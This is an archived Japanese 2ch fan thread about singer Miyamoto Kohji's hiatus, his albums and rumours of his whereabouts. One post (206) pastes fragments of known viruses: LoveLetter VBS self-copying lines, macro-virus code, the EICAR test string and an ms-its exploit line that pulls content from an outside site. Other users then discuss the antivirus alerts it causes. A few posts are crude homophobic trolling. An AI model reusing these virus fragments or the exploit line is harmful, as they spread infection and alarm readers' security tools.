185 :NO MUSIC NO NAME:2006/05/30(火) 00:12:47 ID:Q1WWamAT
エピックと再契約しなくても、
PVの権利はエピにあるんだから、エピにその気があれば出せる。
でも、利益につながらなければ出さないよね・・
よほど売れないと元とれないでしょ。

186 :NO MUSIC NO NAME:2006/05/30(火) 11:40:25 ID:/Jp1uf6I
彼が活動再開してそれでブレイクしたら、エピックが便乗してPV集リリースしたりするんだろうか…。

187 :NO MUSIC NO NAME:2006/05/30(火) 13:47:25 ID:G/y8i0XK
するんじゃない?
再 開 し て ブ レ イ ク し た ら

188 :NO MUSIC NO NAME:2006/05/30(火) 17:00:52 ID:/Jp1uf6I
PV発売は夢だな。

ファミマで「マダガスカルバニラ」味のアイスうってた。
高かったけどうまかった。

189 :NO MUSIC NO NAME:2006/05/31(水) 03:32:53 ID:5cacWjkd
再開して ブレイクすることにかける・・!

あれだけの才能あったら、売り方次第でどうにでもなるのにもったいない
今度こそ、いい事務所に入ってほしい。力のあるところ

190 :NO MUSIC NO NAME:2006/05/31(水) 03:55:46 ID:MFhDMmIs
「ブレイク」って何か彼には似合わない言葉のような気がするんだが。
細々とでも続けてくれればそれでいいよ。
他のアーティストが言ってた言葉だけど、「何百万枚も売れなくても生活は出来るんです」

191 :NO MUSIC NO NAME:2006/05/31(水) 08:59:21 ID:779a5HiX
売れすぎると人生おかしくなるからね。

192 :NO MUSIC NO NAME:2006/05/31(水) 14:54:52 ID:yspwyUDm
売れたくないなんて言ってられないのにこんなとこまで来ちゃって…好きなことさせてもらえるように売れなきゃいけないんだよ

193 :NO MUSIC NO NAME:2006/05/31(水) 23:26:32 ID:QGxzRIrw
確かに彼にはあまり売れ過ぎてほしくない。
微妙なファン心理。
細々というかマイペースにやってきたはずなのに
エピックと契約が切れて
リアルロックスから離れることになったわけだから、
彼も新しい居場所と新しいやり方を探してるのかもしれないね。
あるいはもう見つけてるのかな。

194 :NO MUSIC NO NAME:2006/06/02(金) 17:18:50 ID:hCk8NfCl
オフィシャルが工事中のまま放置されなければ良いが・・

195 :NO MUSIC NO NAME:2006/06/02(金) 23:11:33 ID:WKuhYCdh
宮本浩次、事務所やめちゃったの??

196 :NO MUSIC NO NAME:2006/06/03(土) 15:43:48 ID:3zd9NTLN
miyamotokohji.com からのお知らせ

こんにちは、宮本浩次です。
ご無沙汰してしまってすみません。

このたび、デビューから約10年間お世話になった
所属事務所リアルロックスを離れることになりました。

これに際して、一旦miyamotokohji.comを締めますが、今後のリリースなどについて、
お知らせできることが決まり次第、新HPにてお伝えしたいと思っています。

少しご心配をおかけするかもしれませんが、
また新しい音をお届けできる日を楽しみにしています。


宮本浩次

197 :NO MUSIC NO NAME:2006/06/04(日) 00:36:13 ID:Ths5riq+
ありがとうございます。

毎日元気かどうか考えていました。

必ず待っています。

198 :NO MUSIC NO NAME:2006/06/26(月) 23:44:44 ID:0+++spjI
保守がてら書き込み。
こうちゃんの曲目当てに渡辺美里のアルバム(「Baby Faith」だっけ。結構古いやつだと思う)買った人いる?
いたら感想聞かせてほしい。

199 :NO MUSIC NO NAME:2006/06/27(火) 02:14:49 ID:xT/DSHPU
>198
持ってるよー。
宮もっちゃんらしいなーって感じなので、レンタルとかでも見つけたら聞いてみて欲しいな。
女性の声で聞く宮本曲も、また面白いですよ

ちなみに、宇都宮隆氏とも一曲作品があるけど、こちらも宮本テイストばっちりでしたよ。
コーラスになってないくらいに、声が際立ってるw

200 :NO MUSIC NO NAME:2006/06/28(水) 17:34:47 ID:qoqO/SGy
>>199
ありがとう。
聞いてみるよ。

コーラスといえば、以前スガシカオスレで他にどんなの聴く?って話題になった時に私が「宮本浩次」って言ったら、「シカオは昔、宮本浩次のライブでコーラスをやったことがある」って言ってた人がいたな。
その組み合わせ、凄く見てみたい。

201 :NO MUSIC NO NAME:2006/06/29(木) 00:55:16 ID:5j19mEhX

スガシカオが宮本君のコーラスしてた話、何かの雑誌で読んだ気がする。
Gbだったかな。
Gbで斉藤和義と山崎まさよしと宮本君の三人対談してて、面白かった。

202 :NO MUSIC NO NAME:2006/07/03(月) 22:10:01 ID:yoX7AP59
芸スポのスレで浩ちゃんの名前がちらほら
http://news18.2ch.net/test/read.cgi/mnewsplus/1151906834/

九月の雨もいいけれど、憂鬱なMondayや雨の丘にても名曲だよね〜

203 :NO MUSIC NO NAME:2006/07/04(火) 04:40:09 ID:FLrjFJAb
>>202
8の間違いが116でようやく訂正されてるなw
雨の日に聴きたい曲…アルバムだったらベタだけどumbrella。
まあ結局全部聴きたくなるんだけどね。

204 :NO MUSIC NO NAME:2006/07/04(火) 09:16:32 ID:cw8mHelq
浩ちゃん、お誕生日おめでとうございます。

205 :NO MUSIC NO NAME:2006/07/04(火) 20:02:55 ID:sQvp/Y+B
宮本君♪誕生日おめでとー


206 :NO MUSIC NO NAME:2006/07/04(火) 20:05:36 ID:wkxk2maI
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

207 :NO MUSIC NO NAME:2006/07/04(火) 23:07:21 ID:CTo3RaN3
誕生日おめでっとう!!
ライブ見れるのとっても楽しみにしています。


208 :NO MUSIC NO NAME:2006/07/04(火) 23:54:17 ID:M9iiezBX
宮本さん、誕生日おめでとうございます。
今って公式のメールつながるのかな?

209 :NO MUSIC NO NAME:2006/07/08(土) 11:02:43 ID:fiewAHLN
ここに入ると「ウイルス削除しました」となるのはなぜ?

210 :NO MUSIC NO NAME:2006/07/08(土) 12:33:33 ID:9Bs+831t
アンチウイルスソフトの誤検出。
206にウイルスコード貼り付けたドあほが居る所為だ。
でもオカシナURLを直接踏まない限り問題はないはず。
鬱陶しいならアンチウイルスソフトの設定を弄って2ちゃんのログを検出対象から外したらいい。
専用ブラウザを使っているのならあぼーんしたら良いよ。

211 :NO MUSIC NO NAME:2006/07/13(木) 18:58:18 ID:iBC7g4aq
スガシカオのニューシングル、タイトルが「午後のパレード」。
一瞬、こうちゃんの曲のカバーかと思ったじゃないか。

212 :NO MUSIC NO NAME:2006/07/15(土) 03:17:53 ID:IXRMbStg


213 :NO MUSIC NO NAME:2006/07/23(日) 21:17:48 ID:s2NnBia3
youtubeで検索してみたらタイトで〜のPVアップされてました。なつかし

214 :NO MUSIC NO NAME:2006/07/25(火) 23:13:21 ID:moCoh1nN
>213
情報ありがとうございます!見てきました!初めて見たので嬉しい!

DVD化されたら絶対買うのになぁ、、、

215 :NO MUSIC NO NAME:2006/07/26(水) 02:10:10 ID:40cbcHnN
博多華丸・大吉の博多大吉さんが宮本浩次(もちろんヒロジではない)の曲を好きらしく、
「唯一飽きずに聴き続けているアーティスト」
「宮本浩次のない生活なんて、人生の半分くらい損してる」
などとおっしゃっているほど。
というわけで、とりあえず『奇麗になりたい』を聴いたんだけど、すっかりハマってしまい、
他のアルバム入手のために鋭意手配中。
最近専らRadio CUTEで延々ストリーミングを楽しんでるよ。
彼のことはデビュー時にすでに知っていたけど、
いかんせんCDを扱っている店が行動範囲内に全くなく、ラジオでしか聴けなくて
10年もの間CDとは無縁だったけど、確かに損していた気がする。ライブに行きたいなぁ。

216 :NO MUSIC NO NAME:2006/07/26(水) 02:17:31 ID:40cbcHnN
>>215だけど

前半部分、既出だった。
スマソ、逝ってくる

217 :NO MUSIC NO NAME:2006/07/27(木) 15:10:51 ID:t8i/Qh+B
>>215
ドンマイ。CDは中古かレンタル落ちを探した方が見つかるかも。
ミューミクスの通販でライブ盤あったから購入してみては?
もう取り扱いがなかったらごめんよ。

218 :NO MUSIC NO NAME:2006/07/27(木) 19:19:56 ID:o7yb45wg
>>217
>>215-216だけど、ありがとう。
ミューミクスも今確認してきた。併せてありがとう。
Radio CUTEを聴いていて思うけど、買う価値ありそうだな。
CDは、ヤフオクも品薄だったし(あったとしても『奇麗になりたい』と『umbrella』のみ)
近所(田舎)では見る影もないんで、じっくり待つしかないかなぁと思っていたけど、
おかげさまで、Amazonのマーケットプレイスで見つけることができたよ。

219 :NO MUSIC NO NAME:2006/07/29(土) 15:37:53 ID:hyyxVAfc
時々なんですが、城崎仁を見ると宮本浩次思い出す。微妙に似てない?
http://www.orangepage.net/cooking/jin/index.html

220 :NO MUSIC NO NAME:2006/07/29(土) 19:39:29 ID:z+5GJoGO
ちーとも

221 :NO MUSIC NO NAME:2006/07/29(土) 19:40:20 ID:8NxR0iUE
昔、確かビデオジャムって言う番組で、浩次君と何人かでアカペラで
「きれいになりたい」とか歌ってたの、見た人いますか?
ほんとに歌うまいなーって感動しました。

222 :NO MUSIC NO NAME:2006/07/30(日) 02:02:13 ID:AveGs/Rn
>>219
同感です。
「似てる」まではいきませんが同じ系統の顔じゃないかと。
ちなみにお笑いコンビ「やるせなす」の中村豪も同じ系統の顔じゃないかと。

223 :NO MUSIC NO NAME:2006/07/30(日) 10:36:39 ID:t/ap9jXG
>>222
それって、目つきが悪いっていう繋がりね。

224 :NO MUSIC NO NAME:2006/07/30(日) 20:08:35 ID:/AY5R70x
>219
城咲ちょっと似てるかも。
ビデオジャム見たことある!料理したりもしてたな。

225 :NO MUSIC NO NAME:2006/08/03(木) 19:52:09 ID:RENBi96R
また同じ時間を共有できる日が来るのだろうか……。

226 :NO MUSIC NO NAME:2006/08/07(月) 21:50:29 ID:6Ix33lpd
夏になると邪心ボサノバver.が聞きたくなる。
浩ちゃ〜ん(>_<。)

227 :NO MUSIC NO NAME:2006/08/13(日) 01:02:25 ID:liSoQj6H
「やるせなす」の中村豪似てるかも。ドラマ「タイヨウのうた」音楽関係者役で出てた!
こんなの浩ちゃんこそぴったりの役どころなのになぁ

228 :NO MUSIC NO NAME:2006/08/16(水) 16:43:49 ID:5yVxcAsp


229 :NO MUSIC NO NAME:2006/08/23(水) 12:38:35 ID:Kkq9Va4q
スガシカオが午後のパレードか…

230 :NO MUSIC NO NAME:2006/08/23(水) 18:06:36 ID:IHxGJEMr
デビュー曲がやたら長いタイトルの人だよね
今何してるの?

231 :NO MUSIC NO NAME:2006/08/24(木) 22:51:13 ID:pTDG/Gz+
喫茶店のマスター 夜は弾き語りやってるよ



だとなんかいいなぁ

232 :NO MUSIC NO NAME:2006/08/25(金) 13:51:32 ID:1cfYA5P8


233 :NO MUSIC NO NAME:2006/08/27(日) 21:25:24 ID:GOr6J7RI
>>231
「だいたい彼女は…」を思い出した。
年刊ミヤモトには、ラジオで「僕が将来、喫茶店のマスターになったら、メニューに“自家製味のり”を載せる」と宣言したと書かれている。
手元にある年刊ミヤモトに「創刊!年1回不定期刊行」とあるんだけど、その後何号か発行されたのかな?

234 :NO MUSIC NO NAME:2006/09/02(土) 00:59:28 ID:nRUg5BVy
残念ながら一回きりです…(寂)

遅レスだけど城咲仁似てると思う。声は全然だけど…
奴をTVで見るたびに浩ちゃんに会いたくなる。

235 :NO MUSIC NO NAME:2006/09/03(日) 01:30:31 ID:evizZb4e
宮本君の生歌で林檎が聴きたい…。
あと、九月の雨。
実はどこかでひっそり歌ってたりしないのかな。

236 :NO MUSIC NO NAME:2006/09/07(木) 09:57:42 ID:9le2Vnmj
九月の雨だ・・・。

237 :NO MUSIC NO NAME:2006/09/07(木) 23:15:58 ID:bU3g4WJ3
年刊ミヤモト、オクに出てる 持ってるから買わないけどPVいいなぁ

238 :NO MUSIC NO NAME:2006/09/11(月) 01:53:24 ID:kCalzi3x
この人の曲、普段忘れていても、疲れたときとかふと聞きたくなる。
活動してくれないかなぁ。

239 :NO MUSIC NO NAME:2006/09/21(木) 09:57:19 ID:Vuu89XwG
初めてラジオでメッセージ読んでもらったり色々思い出深いな。

ラジオを録音したのが何本かあるんだがカセットが聴けない環境になってしまった。時代は変わるね…

240 :NO MUSIC NO NAME:2006/09/23(土) 23:45:44 ID:RX4iLspZ
>>239
カセットウォークマンみたいなものなら2000円台とかで余裕で買えるので、
私はそれで凌いでるよ。
しかし羨ましいなぁ、カセット持ってるなんて。

241 :NO MUSIC NO NAME:2006/09/24(日) 04:29:21 ID:PeebQZHu
>>239-240
ついでにLINEケーブルも買って、カセットからHDDに録音すれば
劣化しない状態で保存できるじゃまいか。
そんでCD-Rに焼くなりMP3プレイヤーに落とすなりすれば・・・!

・・・うpって欲しいとは言わないけど、持ち腐れていくのだけは
勿体なさ過ぎると思ったので、是非保存してくださいm(__)m
まとまらなくてすまん。やり方ならネット上にいっぱい落ちてるから、頼む。

242 :NO MUSIC NO NAME:2006/10/01(日) 23:00:01 ID:eTUx+/wl
宮本くんに会いてぇよ〜

243 :NO MUSIC NO NAME:2006/10/04(水) 21:32:11 ID:VMlPmb5P
ほんとに今、何してるんでしょうか。
知ってる人、教えてください。

244 :NO MUSIC NO NAME:2006/10/07(土) 00:56:17 ID:ldsVpfgO
aha〜aha〜Under The moon・・・
キレイだね。月

245 :NO MUSIC NO NAME:2006/10/20(金) 00:51:46 ID:M7sx1fHE
うたききたいよこうちゃん

246 :NO MUSIC NO NAME:2006/10/20(金) 23:26:58 ID:TN/ojHjC
歌 聞きたい ようこちゃん・・・

って、何かと思っちゃった(笑)

247 :NO MUSIC NO NAME:2006/10/22(日) 12:33:36 ID:SC+LwBdb
>>240>>241 HDDが無いので…パソコン本体に保存とか出来るんでしょうかねー
ちょっと調べてみます!
そんなレベルなのでうpとかはもう凄く先の話になっちゃうと思いますが頑張ってみます。

248 :241:2006/10/22(日) 22:04:58 ID:LjP695T0
>>247
クレクレと見まがうようなこと言って申し訳ない。
時代に乗り遅れてファンになったものだから、
先輩方が昔の音源を大切にしてくれてるんだなぁ・・・と思ったら
感慨深さにちょっとだけ熱くなってしまったんですよ。

HDDってのはパソコン本体と考えて貰えば良いです。ハードディスク。
プレイヤーからケーブル経由でパソコンに入ってきた音を、
録音ソフトで音声ファイルに仕立ててやるってこと。
以下など参考になれば幸いです。

・カセットテープから音楽CDを作る
ttp://www.rururubu.com/info/frsoft/hddrec/003/index.htm

・YAHOO!知恵袋
ttp://chiebukuro.yahoo.co.jp/service/question_detail.php?queId=9429714
(ここの回答に張られてるURLが割とわかりやすいかも)

249 :NO MUSIC NO NAME:2006/10/24(火) 02:34:56 ID:rqdLM686
本当に気長に待っててください
アナログ人間ですので…

250 :NO MUSIC NO NAME:2006/10/27(金) 00:45:32 ID:Or9YL+Nh
宮本くんに会っちゃったwエヘエヘ

251 :241:2006/10/28(土) 01:00:28 ID:XFoB2dyh
kwsk!!!


252 :NO MUSIC NO NAME:2006/10/29(日) 11:58:15 ID:lQQoBwTT
>250

 どこで会ったの〜〜〜〜。
 生きてるんだね〜〜〜〜。
 詳細ほしいなーーーー。

253 :NO MUSIC NO NAME:2006/10/31(火) 01:20:13 ID:j9MGkeDt
もう日本にいないよ

254 :NO MUSIC NO NAME:2006/10/31(火) 11:33:31 ID:jlaMPK6f
海外のクリスマスソングをカバーして欲しい。
浩ちゃんの歌声で聴いてみたい。

…と、言ったところで無駄なんだろうけどw

255 :NO MUSIC NO NAME:2006/11/03(金) 22:06:27 ID:gY3HdqhO
会ったって言う人、どこで?

太っちゃったりしてなかった?

256 :NO MUSIC NO NAME:2006/11/04(土) 02:05:17 ID:bKeG9lLM
海外逃亡?

257 :NO MUSIC NO NAME:2006/11/04(土) 23:37:33 ID:8DCBdsq+
そういや、最近聴けなくなっちゃったね、Radio CUTE。
何曲か連続で試聴する方法はあるけど、フルコーラスでは聴けないし。

258 :NO MUSIC NO NAME:2006/11/07(火) 11:31:41 ID:4aunGO4g
そうなんだ?>Radio CUTE
もうしばらくmumixも行ってないな…。

259 :NO MUSIC NO NAME:2006/11/07(火) 17:51:59 ID:VlUdLyFd
ホモ乙

260 :NO MUSIC NO NAME:2006/11/08(水) 14:24:34 ID:QlrqvUCU
あの会社に浩ちゃんはもういないのになんの説明もなく、写真だけは残しているなんておかしな話だねぇ。

261 :NO MUSIC NO NAME:2006/11/08(水) 15:14:47 ID:i1vXITvO
最近、有線(ちなみに福岡)で
「タイトでキュートな…」をよく耳にするんですけど…
「今頃ブレイク!?」とビックリしました。

262 :NO MUSIC NO NAME:2006/11/08(水) 15:19:48 ID:BOIZhxkU
ま、義理立てして具体的な次の動きが決まるまで残してあげてるんだろね。
本当に次があるかどーかはわからんが。


263 :NO MUSIC NO NAME:2006/11/08(水) 15:29:16 ID:1fsr6fvN
>>261
きっと博多大吉がリクエストしてるんだよw

264 :NO MUSIC NO NAME:2006/11/10(金) 10:57:02 ID:cZvW53T/
バロスwww
朝からコーヒー吹き出したじゃないかw

265 :NO MUSIC NO NAME:2006/11/10(金) 22:34:00 ID:3ph03bFA
今日東京FMに博多大吉がゲストで「宮本浩次」の話になって、「キレイになりたい」かかった〜
いい曲なのに世に出ないみたいな話ししてた。
久しぶりに聞いたけどやっぱいい。
DJの鈴木おさむも浩ちゃんのこと知っている風だった。
http://www.media-click.net/PC/FM/TFM/index01.asp
ちなみに15時台です。わーい



266 :NO MUSIC NO NAME:2006/11/11(土) 14:20:22 ID:SPmmiK4l
ガンガレ博多大吉!

267 :NO MUSIC NO NAME:2006/11/11(土) 16:35:40 ID:nhUH4ldo
大吉GJ!

268 :NO MUSIC NO NAME:2006/11/14(火) 17:51:18 ID:NQ8VMAVs
宮本浩次はホモなん?

269 :NO MUSIC NO NAME:2006/11/15(水) 15:33:20 ID:ksQX/P5R
エイズです

270 :NO MUSIC NO NAME:2006/11/15(水) 19:54:32 ID:4D20aEKT
>>262
てか、写真はずすと他に誰もいなくなっちゃうからだろ。
事務所にとってはとにかくアクセスしてほしいわけだから。
そういう事務所けっこうあるよ、ググってみると。
もういねえのに写真やら昔の情報出しっぱなし。
タレントやアーチストにとってはあまり気分のいいものではないと思うが。

271 :NO MUSIC NO NAME:2006/11/15(水) 21:37:19 ID:lwPSoQvN
「今浩ちゃんは何をしてますか?」

「宮本くんに会っていますか?」

とBBSに書き込みされる、BABIちゃんの立場にもなってほしい。

272 :NO MUSIC NO NAME:2006/11/17(金) 06:50:27 ID:p2JYA+c/
知るかボケ

273 :NO MUSIC NO NAME:2006/11/20(月) 23:36:41 ID:4YURQLH0


274 :NO MUSIC NO NAME:2006/11/20(月) 23:46:58 ID:YVcNiMCk
大吉、なんか気になる。

275 :NO MUSIC NO NAME:2006/11/21(火) 00:29:12 ID:Eus/He2d
>>274
大吉さんは素敵な人だよ。私はとても好き。
なんというか、芸人・漫才師としての魅力だけではなく、
ユーモラスで上品で腰が低くて。
そんな実際とは裏腹にやや辛口なトークもあって、味わい深い。
文才もあるし。まずは手始めにブログがおすすめ。

……つい突っ走ってしまった。スマソ。

276 :NO MUSIC NO NAME:2006/11/21(火) 02:13:00 ID:TVZs3GeW
宮本浩次のことを語れる人がいるって
何だか嬉しいなぁ


277 :NO MUSIC NO NAME:2006/11/23(木) 19:58:37 ID:kr5j9HS8
エレファントカシマシってもうやってないのー?

278 :NO MUSIC NO NAME:2006/11/23(木) 20:53:02 ID:zFkI0sc4
クマー

279 :NO MUSIC NO NAME:2006/11/27(月) 04:09:50 ID:/+/EeH/6
   ∩___∩
   | ノ      ヽ
  /  ●   ● |    クマー
  |    ( _●_)  ミ
 彡、   |∪|  、`\
/ __  ヽノ /´>  )
(___)   / (_/
 |       /
 |  /\ \
 | /    )  )
 ∪    (  \
       \_)




280 :NO MUSIC NO NAME:2006/11/27(月) 20:53:09 ID:OCvForD+
メールから半年・・(´・ω・`)

281 :NO MUSIC NO NAME:2006/11/27(月) 23:53:03 ID:Iex0Hz26
アタックチャーンス

282 :NO MUSIC NO NAME:2006/11/29(水) 06:39:24 ID:/kXLLl4y
        /"lヽ
       ( ,人)     ___         ___     ____
       |  |    / ___ \ ◎    (___)   (____  )
       |  |   (__/ \ \                / /
       |  |         \ \_   ______   __/  \_
     \ノ   ノ/        \__) (_ペニス )  (___/^\___)
    〜(__人_) 〜





283 :NO MUSIC NO NAME:2006/12/02(土) 23:26:56 ID:eGInvk4T
偶然、このスレ見つけた。嬉しかった。
綺麗になりたいを今、聞いてます。ほんと、こうちゃん、どうしたんだろ?
会いたい〜

284 :sage:2006/12/03(日) 21:15:22 ID:9+bXooYl
自分もこのスレ見つけたとき、嬉しかった!
いつかまた、あのまったりしたライブが観たいなぁ。

あー、Pon Pon Ponが聴きたいよー

285 :NO MUSIC NO NAME:2006/12/05(火) 00:27:30 ID:Cu2+BdjV
ブクオフでエレカシと間違えて奇麗になりたい買ったけど、聴いてみたら予想外にツボだ・・・
活動止まってるとは残念。

286 :NO MUSIC NO NAME:2006/12/05(火) 01:22:51 ID:03mH/TrU
こうちゃんはもう日本にいませんよ

287 :NO MUSIC NO NAME:2006/12/05(火) 15:58:15 ID:pGMKJvzm
そしてこの世にも…

288 :NO MUSIC NO NAME:2006/12/06(水) 15:33:37 ID:ep/YQutv
この人の音楽を聞いて、やっぱりこの業界に残ることにした関係者も
ここにいますが。

289 :NO MUSIC NO NAME:2006/12/13(水) 19:24:14 ID:iZIvxLGL
で?

290 :NO MUSIC NO NAME:2006/12/14(木) 01:25:38 ID:ml94JSjA
今日まったく関係ないライブで塚越氏を見かけたときは捕まえて浩ちゃんの近況知らないか聞き出したくてしょうがなかった…

291 :NO MUSIC NO NAME:2006/12/14(木) 14:54:08 ID:oP9iKwhY
聞き出して〜!

292 :NO MUSIC NO NAME:2006/12/20(水) 02:36:56 ID:nOdpBss4
ショック受けるから知らないほうがいいよ

293 :241:2006/12/21(木) 00:17:36 ID:RRd/S4ha
ショックだろうが何だろうが嘘じゃないなら教えて貰いたいわ。
何年おあずけ喰らってると思ってるのか。。

294 :sage:2006/12/21(木) 22:33:24 ID:z87xEs57
どうしてるか気になります。
音楽やめないでほしい。
誰か、近況をしってるひと、おしえてください。

295 :NO MUSIC NO NAME:2006/12/24(日) 14:21:28 ID:ccHl5o9x
単独スレあったんだね、知らんかったw
最近聞く音楽もないから、4枚とも引っ張り出して聞いてるけど、
やっぱいいわあ
個人的には3,4thが好きなんだが、このスレ的には1th、2ndが
人気なのかな?

296 :NO MUSIC NO NAME:2006/12/25(月) 00:08:43 ID:mdww3rI8
私は最初、1st,3rdが好きで、それらに比べると2nd,4thはイマイチだったんだが、
今はどちらかというと逆転している。惹かれる曲は2nd,4thに多い。
もちろんどれも好きであることが前提なのだが。
その時々の心身のコンディションなんかで聴こえ方が違うんだと思う。
だから今後また好んで聴くアルバムは変わっていくかも。それはそれでよいかな、と。

297 :NO MUSIC NO NAME:2006/12/31(日) 06:05:03 ID:iaQ6vCLa
デビューからのファンだったけど
サイレントキスで微妙になって、次に憂鬱なマンデーの初めのほうだけ
ラジオで聞いたらいまいちで、その先から買ってない。

先日とつぜん取り付かれたように3、4とシングル1枚かったら、
すごいよくて、損してた!と激しく後悔。

バニラクレープ、何これ?これなに??
天才?
なにもの??
すごすぎ!
憂鬱なマンデーも最後のほうすごいじゃん、泣けんじゃん。
こんなんだったら、ライブとかももっと行ってたのに。

mumixも録音してないよ。ばかばか私の馬鹿。

298 :NO MUSIC NO NAME:2007/01/20(土) 01:10:18 ID:SpgynJh1
私は初めて買ったのが2ndでした(「だいたい彼女は…」目当て)。
それで「集めようかな」と思った矢先にたまたま中古で1stの初回盤を見つけた。
それ聴いて完全にハマってシングル全部集めた。

そしたら3rdが出て「宮本浩次ハズさないわ」と実感。
4thは出た当初は地味な印象だったけど、聴けば聴くほど味が出てくる。

どれもイイけど一番聴き込んだのは3rdかなぁ。

299 :NO MUSIC NO NAME:2007/01/22(月) 03:13:42 ID:aonErGCv
バニラクレープが無性に聞きたくなった

300 :NO MUSIC NO NAME:2007/01/25(木) 23:44:20 ID:em2jSSVO
>>300なら浩次くん今年再始動

301 :NO MUSIC NO NAME:2007/02/02(金) 15:18:55 ID:sDfvqDEF
胸に染ーむーような声が今ないが大丈夫

大丈夫なんだ!

302 :NO MUSIC NO NAME:2007/02/06(火) 14:54:16 ID:4hJzkLzT
歌ききたいよこうちゃーん

303 :NO MUSIC NO NAME:2007/02/10(土) 23:42:39 ID:+kFYDxvC
mixiコミュ人数、457人。

304 :NO MUSIC NO NAME:2007/02/14(水) 20:47:20 ID:BeuPzZB/
オリラジのコントを見ていたらなんか
「タイトでキュートなヒップがシュールなジョークとムードでテレフォンナンバー」を
思い出した。

305 :NO MUSIC NO NAME:2007/02/19(月) 23:49:13 ID:+epqQ2Bi
最近1stアルバムばっかり聞いている。やっぱりいいなぁ、ライブしてくれないかなぁ。


306 :sage:2007/02/21(水) 12:29:00 ID:obG2NPY0
デビューした年はすごい仕事っぷりだったのにどうしちゃったんだろう。元気にしてるならいいんだけど…

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)